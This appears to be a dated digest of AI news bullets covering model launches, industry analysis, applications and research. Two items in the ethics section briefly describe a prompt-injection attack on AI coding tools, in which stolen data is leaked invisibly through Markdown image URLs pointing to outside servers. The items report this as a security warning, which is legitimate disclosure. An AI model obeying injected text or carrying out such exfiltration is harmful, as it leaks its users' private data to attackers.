AI Updates on 2025-11-20

AI Model Announcements

  • Meta releases SAM 3, unifying model architecture for detection and tracking in computer vision @AIatMeta
  • Alibaba announces Jan-v2-VL, a new multimodal agent capable of executing 49 steps without failing, significantly outperforming other models on long-horizon tasks @Alibaba_Qwen
  • AI2 releases OLMo 3 family of fully open language models, including the best 32B base model, best 7B Western thinking and instruct models, and first 32B fully open reasoning model, with complete training data, code, checkpoints, and logs @natolambert
  • Google launches Gemini 3 Pro Image (Nano Banana Pro), achieving state-of-the-art performance in image generation and editing with improved text rendering, world knowledge integration via Google Search, and support for 1K, 2K, and 4K resolution outputs @GoogleDeepMind
  • OpenAI releases GPT-5.1 Pro to all Pro users, delivering 10-15% improvement over GPT-5 Pro for complex work including writing help, data science, and business tasks @OpenAI
  • OpenAI launches GPT-5.1-Codex-Max, a significant improvement in coding capabilities @sama
  • xAI introduces Grok 4.1 Fast, their best tool-calling model with 2M context window, trained with long-horizon RL for multi-turn scenarios and real-world enterprise use cases like customer support @xai
  • Gemini 3 achieves state-of-the-art performance on SWE Bench Verified using a standard agent harness @OfficialLoganK
  • NVIDIA releases Nemotron-Parse v1.1, next-generation OCR for parsing PDFs and PPTs into structured, machine-ready output with text, bounding boxes, and semantic classes @andimarafioti

AI Industry Analysis

  • MIT research shows closed models dominate with 80% of monthly LLM tokens despite being 6x more expensive than open models with only modest performance advantages, suggesting $24.8 billion in potential consumer savings if users switched to superior open alternatives @ClementDelangue
  • Google prohibits its developers from using publicly launched Antigravity IDE for work, requiring use of internal version called Jetski that supports Google's monorepo and custom tooling, highlighting Google's unique tech stack isolation @GergelyOrosz
  • AI developers remain bullish about growth despite low AI penetration in businesses, with many skilled teams starting to deliver significant ROI even as 95% of AI pilots reportedly fail due to methodological issues in studies @AndrewYNg
  • Frontier open models typically reach performance parity with frontier closed models within months, yet users continue selecting closed models even when open alternatives are cheaper and offer superior performance @ClementDelangue
  • AI coding agents may fundamentally change development workflows as they execute framework changes without questioning decisions, unlike human developers who would dismiss impractical suggestions @GergelyOrosz
  • Stuut raises $29.5M Series A led by a16z to automate accounts receivable work for blue-collar businesses in manufacturing, medical devices, logistics, and distribution using AI agents @TAlaruri
  • Natural gas has become central to both AI datacenter power and LNG exports, with most new datacenters expected to be powered by natural gas in the near term @a16z

AI Ethics & Society

  • Google introduces SynthID detection feature in Gemini app, allowing users to upload images and verify if they were generated by Google AI through imperceptible digital watermarks @GeminiApp
  • Simon Willison warns that Antigravity is vulnerable to prompt injection attacks where malicious actors can exfiltrate data by constructing URLs to external servers and invisibly leaking stolen information through Markdown image rendering @simonw
  • The same Markdown image data exfiltration vulnerability was previously reported and fixed in Copilot chat for VS Code, but remains unpatched in Windsurf as of May 2025 @simonw
  • Research reveals growing crisis of economically and socially dislocated young adults, with nearly 10% in UK and US not working, seeking work, in education, or raising children, doubling in the UK over a decade @jburnmurdoch

AI Applications

  • Perplexity launches Comet browser for Android with voice mode allowing users to chat with and control tabs, summarize content, and take actions across all tabs without losing context @perplexity_ai
  • OpenAI rolls out group chats globally to ChatGPT Free, Go, Plus and Pro users, transforming ChatGPT from single-player to multi-player experience @OpenAI
  • NotebookLM introduces slide deck generation feature for Pro users, converting sources into detailed decks for reading or presentation-ready slides that are fully customizable @NotebookLM
  • Nano Banana Pro demonstrates ability to create complex infographics, comic strips, menus, marketing materials, and logo designs in single prompts, potentially replacing tools like Canva for many use cases @deedydas
  • Andrew Ng demonstrates using AI for agentic document extraction on NVIDIA's latest 10-Q earnings report, achieving highly accurate results powered by document pre-trained transformer model @AndrewYNg
  • xAI launches Agent Tools API enabling developers to give Grok autonomous web browsing, X post searching, code execution, and document retrieval capabilities with just a few lines of code @xai
  • Figma integrates Nano Banana Pro across its platform, enabling users to adjust images while maintaining visual DNA, prompt existing images in new contexts, and composite multiple images into coherent scenes @figma

AI Research

  • OpenAI publishes research showing GPT-5 accelerating scientific discovery through case studies where it helped researchers synthesize scattered results, surface mechanisms, navigate literature conceptually, and generate new proofs of unsolved propositions @OpenAI
  • GPT-5 solved a 2013 conjecture and a COLT 2012 open problem after two days of thinking in scaffolded experiments with university and national-lab partners @SebastienBubeck
  • Research demonstrates that LLMs are trained to model the entire distribution, not just the average, and reinforcement learning enables them to go beyond human distribution, similar to AlphaGo's Move 37 discovery @polynoamial
  • OLMo 3 uses direct preference optimization (DPO) with Qwen3 32B as chosen model and Qwen3 0.6B as rejected, based on delta learning hypothesis that models learn from the difference between chosen and rejected samples rather than overall quality alone @natolambert
  • AI2 introduces "active refilling" technique in RL training that keeps generations from learner nodes constantly flowing until there's a full batch of completions with nonzero gradients, a major advantage of asynchronous approach @natolambert
  • Gemini 3 demonstrates advanced reasoning with access to live search, enabling creation of infographics and visualizations using real-time information from Google's knowledge base @GoogleDeepMind
  • Research on using AI to check work of other AIs remains hugely under-researched, with one paper finding the technique effective but lacking follow-up studies on whether using different models helps reduce errors @emollick
  • Grok 4.1 Fast was trained on diverse simulated environments across dozens of domains, achieving state-of-the-art performance on real-world agentic workflows and excelling at real-time information retrieval and deep research @xai
  • OLMo 3 32B Think scores within 1-2 points of Qwen3 32B on reasoning benchmarks including AIME and GPQA, representing the first fully open reasoning model at 32B scale or larger @natolambert